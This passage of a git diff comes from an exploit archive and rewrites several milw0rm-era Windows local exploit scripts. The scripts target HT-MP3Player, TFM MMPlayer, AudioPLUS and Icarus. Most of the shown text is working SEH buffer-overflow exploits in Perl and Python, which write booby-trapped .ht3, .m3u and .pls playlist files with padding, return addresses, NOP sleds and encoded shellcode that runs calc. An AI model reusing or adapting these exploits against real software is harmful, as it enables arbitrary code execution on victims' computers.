+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+############################################################
+open(myfile,'>>hack4love.ht3');
+print myfile $bof.$nsh.$seh.$nop.$sec;
+############################################################
+
+# milw0rm.com [2009-06-29]
diff --git a/platforms/windows/local/9038.py b/platforms/windows/local/9038.py
index 5056c534c..f4d0c15ac 100755
--- a/platforms/windows/local/9038.py
+++ b/platforms/windows/local/9038.py
@@ -1,50 +1,50 @@
-#usage: exploit.py
-print "**************************************************************************"
-print " HT-MP3Player 1.0 (.ht3) Universal Buffer Overflow (SEH)\n"
-print " Original author: hack4love<=(my friend)\n"
-print " Universal exploit : His0k4\n"
-print " Tested on: Windows XP Pro SP3 (EN)\n"
-print " greetz: All friends (DZ),sec-r1z.com\n"
-print "**************************************************************************"
-   
-# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-shellcode=(
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
-"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x53\x4b\x48\x4e\x47"
-"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x54\x4a\x31\x4b\x38"
-"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x33\x4b\x48"
-"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
-"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x43\x46\x45\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x58"
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x44"
-"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
-"\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x30\x43\x4c\x41\x53"
-"\x42\x4c\x46\x46\x4b\x58\x42\x54\x42\x33\x45\x58\x42\x4c\x4a\x57"
-"\x4e\x30\x4b\x58\x42\x34\x4e\x50\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x38\x42\x4b"
-"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x46\x4e\x43\x4f\x55\x41\x43"
-"\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
-"\x42\x35\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
-"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
-"\x4e\x56\x43\x46\x42\x50\x5a")
-
-payload =  "D_Z"   
-payload += shellcode
-payload += "\x41"*(4100-len(shellcode))
-payload += "\xE9\xF7\xEF\xFF\xFF"
-payload += "\x74\xF9\x42\x42"
-payload += "\x8C\x27\x40\x00" #p/p/r HTMP3Player.exe
-
-try:
-    out_file = open("exploit.ht3",'w')
-    out_file.write(payload)
-    out_file.close()
-    raw_input("\nExploit file created!\n")
-except:
-    print "Error"
-
-# milw0rm.com [2009-06-29]
+#usage: exploit.py
+print "**************************************************************************"
+print " HT-MP3Player 1.0 (.ht3) Universal Buffer Overflow (SEH)\n"
+print " Original author: hack4love<=(my friend)\n"
+print " Universal exploit : His0k4\n"
+print " Tested on: Windows XP Pro SP3 (EN)\n"
+print " greetz: All friends (DZ),sec-r1z.com\n"
+print "**************************************************************************"
+   
+# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+shellcode=(
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
+"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x53\x4b\x48\x4e\x47"
+"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x54\x4a\x31\x4b\x38"
+"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x33\x4b\x48"
+"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
+"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x43\x46\x45\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x58"
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x44"
+"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
+"\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x30\x43\x4c\x41\x53"
+"\x42\x4c\x46\x46\x4b\x58\x42\x54\x42\x33\x45\x58\x42\x4c\x4a\x57"
+"\x4e\x30\x4b\x58\x42\x34\x4e\x50\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x38\x42\x4b"
+"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x46\x4e\x43\x4f\x55\x41\x43"
+"\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
+"\x42\x35\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
+"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
+"\x4e\x56\x43\x46\x42\x50\x5a")
+
+payload =  "D_Z"   
+payload += shellcode
+payload += "\x41"*(4100-len(shellcode))
+payload += "\xE9\xF7\xEF\xFF\xFF"
+payload += "\x74\xF9\x42\x42"
+payload += "\x8C\x27\x40\x00" #p/p/r HTMP3Player.exe
+
+try:
+    out_file = open("exploit.ht3",'w')
+    out_file.write(payload)
+    out_file.close()
+    raw_input("\nExploit file created!\n")
+except:
+    print "Error"
+
+# milw0rm.com [2009-06-29]
diff --git a/platforms/windows/local/9047.pl b/platforms/windows/local/9047.pl
index 70cba4df8..2fc0d2e36 100755
--- a/platforms/windows/local/9047.pl
+++ b/platforms/windows/local/9047.pl
@@ -1,43 +1,43 @@
-#!/usr/bin/perl
-#[+] Bug : TFM MMPlayer 2.0 (m3u/ppl) Universal Buffer Overflow Exploit (SEH)
-#[+] Author : ThE g0bL!N
-# # Greetz to all my friends
-## Tested on: Windows XP Pro SP2 (Fr)
-# Big Thnx :His0k4          
-#Download:http://www.tfm.ro/mmplayer/download/mmplayer.zip
-##########################################################
-# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-my $pad1="D_Z"; #trick track
-my $junk="\x41" x (4088-length($shellcode));
-my $jmp="\xE9\x03\xF0\xFF\xFF";
-my $pad2="\x42"x 12;
-my $next_seh="\xEB\xED\x41\x42";
-my $seh="\xB4\x28\x40\x00";
-
-open(myfile,'>>exploit.m3u');
-print myfile $pad1.$shellcode.$junk.$jmp.$pad2.$next_seh.$seh;
-
-# milw0rm.com [2009-06-30]
+#!/usr/bin/perl
+#[+] Bug : TFM MMPlayer 2.0 (m3u/ppl) Universal Buffer Overflow Exploit (SEH)
+#[+] Author : ThE g0bL!N
+# # Greetz to all my friends
+## Tested on: Windows XP Pro SP2 (Fr)
+# Big Thnx :His0k4          
+#Download:http://www.tfm.ro/mmplayer/download/mmplayer.zip
+##########################################################
+# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
+"\x4e\x46\x43\x36\x42\x50\x5a";
+my $pad1="D_Z"; #trick track
+my $junk="\x41" x (4088-length($shellcode));
+my $jmp="\xE9\x03\xF0\xFF\xFF";
+my $pad2="\x42"x 12;
+my $next_seh="\xEB\xED\x41\x42";
+my $seh="\xB4\x28\x40\x00";
+
+open(myfile,'>>exploit.m3u');
+print myfile $pad1.$shellcode.$junk.$jmp.$pad2.$next_seh.$seh;
+
+# milw0rm.com [2009-06-30]
diff --git a/platforms/windows/local/905.c b/platforms/windows/local/905.c
index c1f749adf..64fe37170 100755
--- a/platforms/windows/local/905.c
+++ b/platforms/windows/local/905.c
@@ -134,6 +134,6 @@ printf("=====Computername, Local Buffer Overflow Exploit=========\n");
 printf("======coded by class101=======[Hat-Squad.com 2005]=====\n");
 printf("============================================\n");
 printf(" \n");
-}
-
-// milw0rm.com [2005-04-01]
+}
+
+// milw0rm.com [2005-04-01]
diff --git a/platforms/windows/local/9064.pl b/platforms/windows/local/9064.pl
index 9e1764504..184480f6c 100755
--- a/platforms/windows/local/9064.pl
+++ b/platforms/windows/local/9064.pl
@@ -1,42 +1,42 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# AudioPLUS 2.00.215 (.m3u / .lst File) Local buffer Overflow (seh)
-# # Greetz to all my friends
-# form egypt
-## easy :d
-## Tested on: Windows XP Pro SP2 (EN)
-################################################################
-my $bof="\x41" x 4116;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\xb8\x15\xd1\x72";
-my $nop="\x90" x 20;
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-###################################################################
-open(myfile,'>> hack4love.m3u');
-print myfile $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-
-# milw0rm.com [2009-07-01]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# AudioPLUS 2.00.215 (.m3u / .lst File) Local buffer Overflow (seh)
+# # Greetz to all my friends
+# form egypt
+## easy :d
+## Tested on: Windows XP Pro SP2 (EN)
+################################################################
+my $bof="\x41" x 4116;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\xb8\x15\xd1\x72";
+my $nop="\x90" x 20;
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+###################################################################
+open(myfile,'>> hack4love.m3u');
+print myfile $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+
+# milw0rm.com [2009-07-01]
diff --git a/platforms/windows/local/9070.pl b/platforms/windows/local/9070.pl
index e7c9ca7d2..a4ea0e819 100755
--- a/platforms/windows/local/9070.pl
+++ b/platforms/windows/local/9070.pl
@@ -1,35 +1,35 @@
-#!/usr/bin/perl
-# AudioPLUS 2.00.215 (.pls) Local buffer Overflow (seh)
-print "AudioPLUS 2.00.215 (.pls) Local buffer Overflow (seh)\n";
-my $header = "[playlist]\x0ANumberOfEntries=1\x0AFile1=http://";
-my $junk="\x41" x 4103;
-my $nseh="\xEB\x06\x90\x90";
-my $seh="\x35\x2F\xD1\x72"; # jmp msacm32.drv ebx
-my $nop="\x90" x 20;
-my $shellcode=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-open(myfile,'>> exploit.pls');
-print myfile $header.$junk.$nseh.$seh.$nop.$shellcode;
-
-# milw0rm.com [2009-07-01]
+#!/usr/bin/perl
+# AudioPLUS 2.00.215 (.pls) Local buffer Overflow (seh)
+print "AudioPLUS 2.00.215 (.pls) Local buffer Overflow (seh)\n";
+my $header = "[playlist]\x0ANumberOfEntries=1\x0AFile1=http://";
+my $junk="\x41" x 4103;
+my $nseh="\xEB\x06\x90\x90";
+my $seh="\x35\x2F\xD1\x72"; # jmp msacm32.drv ebx
+my $nop="\x90" x 20;
+my $shellcode=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+open(myfile,'>> exploit.pls');
+print myfile $header.$junk.$nseh.$seh.$nop.$shellcode;
+
+# milw0rm.com [2009-07-01]
diff --git a/platforms/windows/local/912.c b/platforms/windows/local/912.c
index 3344c5dc5..7ada08a02 100755
--- a/platforms/windows/local/912.c
+++ b/platforms/windows/local/912.c
@@ -65,6 +65,6 @@ printf("GetDataBack for NTFS v2.31 is not installed on your system!\n");
 }
 
 return 0;
-}
-
-// milw0rm.com [2005-04-04]
+}
+
+// milw0rm.com [2005-04-04]
diff --git a/platforms/windows/local/9146.pl b/platforms/windows/local/9146.pl
index 3d7629d21..b9952ea3c 100755
--- a/platforms/windows/local/9146.pl
+++ b/platforms/windows/local/9146.pl
@@ -1,67 +1,66 @@
-
-#!/usr/bin/perl
-#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
-# Icarus 2.0  Local Stack-based Buffer overflow Exploit             			     #
-# By : [0]x80->[H]4x²0r									     #
-# Contact : hashteck[at]Gmail[dot]com						             #
-# From : Morocco									     #
-# PoC by : ThE g0bL!N									     #
-#[+]--------------------------------------------------------------------------------------[+]#
-# Program : Icarus 2.0  								     #
-#[+]--------------------------------------------------------------------------------------[+]#
-# Tested Under Win$hit 6.0 Vista Pro							     #
-#[+]--------------------------------------------------------------------------------------[+]#
-##############################################################################################
-#####################################  Proud to be HACKER  ###################################
-##############################################################################################
-#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
-#											     #
-#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
-# Put the file generated by this exploit in Icarus Directory ( After you made a back up of   #
-# the original file ) then launch Icarus.exe and b000m , calc.exe is launched                #
